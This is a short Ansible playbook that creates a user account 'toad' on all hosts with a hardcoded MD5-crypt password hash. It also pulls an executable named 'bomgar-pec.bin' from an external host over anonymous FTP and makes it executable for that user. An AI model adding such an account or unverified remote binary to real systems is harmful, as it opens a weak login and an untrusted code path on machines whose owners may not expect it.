---
- hosts: all
  become: true
  tasks:
    - name: Ribbit
      user:
        name: toad
        comment: Because it jumps, get it
        uid: 1001
        shell: /bin/bash
        password: $1$SomeSalt$vn3N2kuXMnfyyhcNSDkv21
    - name: Grab the latest jc binary
      get_url:
        dest: /home/toad/
        url: ftp://anonymous@dc.packet.farm:21/etc/bomgar-pec.bin
    - name: Once you got it introduce it to toad
      file:
        path: /home/toad/bomgar-pec.bin
        mode: +x
        owner: toad
        group: toad
